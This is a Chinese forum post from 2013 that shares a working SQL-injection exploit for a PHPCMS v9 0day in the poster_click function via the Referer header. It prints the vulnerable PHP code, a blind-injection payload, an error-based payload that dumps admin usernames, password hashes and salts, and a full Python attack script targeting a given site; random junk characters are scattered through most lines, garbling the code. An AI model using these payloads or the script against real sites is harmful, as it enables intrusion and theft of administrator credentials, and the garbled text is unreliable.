有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
( L8 D. Z/ t* A
) o, c% Y! \0 ?问题函数\phpcms\modules\poster\index.php2 D- h+ f: x! t h, e2 Q$ {
, L+ \ u R9 {public function poster_click() {
5 ]4 M. r0 F; T& f; X$id = isset($_GET['id']) ? intval($_GET['id']) : 0;8 C# \% G6 s9 S' N3 S/ K+ z; {
$r = $this->db->get_one(array('id'=>$id));
f+ q& A/ L" z1 ~$ Lif (!is_array($r) && empty($r)) return false;0 q: [% w4 N V/ p
$ip_area = pc_base::load_sys_class('ip_area');9 V! z, E) V& e4 E7 t7 ?5 }; ^
$ip = ip();
- J5 p. [( \8 s0 A$area = $ip_area->get($ip);
7 t O# U4 i6 T5 R: l1 f$username = param::get_cookie('username') ? param::get_cookie('username') : '';1 x" [/ g, F, Z9 l, i3 |) x! r: p
if($id) {) _2 |7 g/ j2 _1 c" [9 {2 |, v s
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
3 d' j2 {$ }, Y( Z0 Q0 N8 i" r7 \$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));' P" i) V/ _1 E$ s9 Z4 @9 Y2 m
}0 I$ s1 |' |; O* v$ ]4 s
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));2 l+ B7 C7 r8 E u4 ~
$setting = string2array($r['setting']);
' d& x1 N% y I2 B5 d' N$ Jif (count($setting)==1) {- n: Z( y. ?/ E, w; @% r. G
$url = $setting['1']['linkurl'];9 p( e: U1 G6 z; `4 u) X8 e8 j
} else {
8 d- T5 J( _0 q9 E3 L$ T$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];" c4 h7 c& Y7 I
}
: d2 v- H( y2 X6 Q0 ^/ B, Hheader('Location: '.$url);
, @5 s1 c3 ?4 i6 L2 \2 B0 P P5 [}4 \5 M" L4 l0 {% e9 W
4 a, w) T7 W; h4 K
" F8 I. e% y2 v9 O6 ?
, G! |# G* N8 K6 O' x) S1 e利用方式:
3 H" E/ F9 Y5 ~. v, a) s, [5 b0 y; V8 h
1、可以采用盲注入的手法:+ O* U2 O$ ~# V4 @1 n# C
. |) m' ]; o6 ~! V, S; Treferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
' U7 ^( m+ f0 y {: U2 n$ Z' k4 v8 a: Z) W, u! e
通过返回页面,正常与否一个个猜解密码字段。
9 a6 @+ u6 W8 W+ Y0 `# d* n$ } Z4 g8 w' r$ s4 W
2、代码是花开写的,随手附上了:1 o3 Q8 q) H! ]
! d; N( g1 }& U8 {. s% ~1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
7 M2 p i3 p6 ]5 ]( r8 c3 |8 H8 Y i# d
此方法是爆错注入手法,原理自查。
4 Y2 u: D% K7 [1 i' z3 T- |! M9 ^/ L a; i$ p6 Y. x
. R5 p; O6 |% _$ ?: [7 {
$ d7 j/ L c3 O+ Z) h8 C利用程序:9 Z) j5 Q2 T" q8 ?& S: S$ F" ~/ Z
5 h$ K! J6 g/ \5 Q/ D7 n
#!/usr/bin/env python# v) M5 J7 O! e
import httplib,sys,re
8 d+ A) `7 ?2 X5 O8 _7 U$ D/ y1 N5 v: w3 i2 `" {, ^# F. e
def attack(): [+ t9 D9 Z1 |4 j3 f: z7 a
print “Code by Pax.Mac Team conqu3r!”
1 A; I& f: }. ^print “Welcome to our zone!!!”
8 ~+ N, w4 {2 Kurl=sys.argv[1]. G, m3 U* h |0 L q% Q2 Y7 [# H
paths=sys.argv[2]% D1 r; ~$ T* W( f
conn = httplib.HTTPConnection(url)
1 @% b! R8 K4 j& a: Z$ @i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
9 B+ \& a* X$ R& b( N. E) M1 F“Accept”: “text/plain”,
$ y# B/ q- b4 O“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}; q* N! R, E% r, C1 s; |
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
* ]$ f( c- M0 B9 d# I, Jr1 = conn.getresponse()
; p2 u, j/ D6 X/ I/ C7 }datas=r1.read()6 G: m; X* d) A2 _% I+ a9 Y
datas=re.findall(r”Duplicate entry \’\w+’”, datas)* Q: ?5 z7 \& b! @/ n+ O) t
print datas[0]; f1 [) U! H" \; X
conn.close()0 `8 m* g3 @$ G3 f+ m
if __name__==”__main__”:8 S Z: E- B5 c
if len(sys.argv)<3:% ?+ @8 y2 W/ e4 P) z( l% n
print “Code by Pax.Mac Team conqu3r”9 h! ~; P \$ e& h, S9 Y6 p
print “Usgae:”# m8 G% O3 c, k' m- ^
print “ phpcmsattack.py www.paxmac.org /”
- c* L8 w* J+ [print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
. v" P& C. S" @' @, h9 x, lsys.exit(1)) [6 R2 p( F2 D* I& C0 W
attack()! r( f5 @4 c+ O8 ]' T) ]" x4 q
5 q: P G1 a) p! P- k9 x |
发表于 2013-1-11 21:01:00
收藏
支持
反对